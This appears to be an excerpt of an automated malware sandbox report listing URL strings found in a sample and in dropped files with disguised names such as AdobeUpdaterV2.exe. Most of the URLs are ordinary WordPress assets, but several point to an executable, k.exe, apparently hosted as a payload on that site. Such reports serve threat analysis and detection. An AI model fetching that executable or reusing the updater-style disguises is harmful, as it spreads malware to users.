                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/gsap/gsap.min.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/assets/plugins/modernizr/modernizr.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/elegant-icons/assets/css/elegant-icons
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/icons/font-awesome/assets/css/all.min.css?ve
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/google-map.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/css/elementor.min.c
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.js
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-membership/assets/css/newhome-membership.min.css?ver=
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/newhome-membership/assets/js/newhome-membership.min.js?ver=6.
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.6
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/grid.min.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/helper-parts.min.css?ver=6
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/css/main.min.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/assets/js/main.min.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/eleme
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/shortcodes/parallax-images/assets
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/css/plugins/animate/animate.min.css?ver=6.5.
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/grid.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qi-blocks/inc/slider/assets/plugins/5.4.5/swiper.min.css?ver=
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/qode-framework/inc/common/assets/plugins/select2/select2.full
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.8.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.8.0
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/themes/newhome/assets/css/main.min.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/themes/newhome/assets/js/main.min.js?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/themes/newhome/style.css?ver=6.5.3
                        Source: file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe(
                        Source: file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe9
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exeY
                        Source: file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exexe
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/03/error-page-bg-img.jpg);
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/03/title-bg-img.jpg);
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-180x180.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-192x192.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-270x270.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/cropped-fav-32x32.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/live-chat.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/logo-white.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/06/logo.png
                        Source: EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/2023/09/logo.png
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-frontend-lite.min.css?ver=1690457761
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.cs
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687512247
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/global.css?ver=1690457762
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/post-2986.css?ver=1697730127
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-content/uploads/elementor/css/post-6.css?ver=1690457761
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/hooks.min.js?ver=2810c76e705dd1a53b18
                        Source: file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0
                        Source: file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.drString found in binary or memory: https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill-inert.min.js?ver=3.1.2
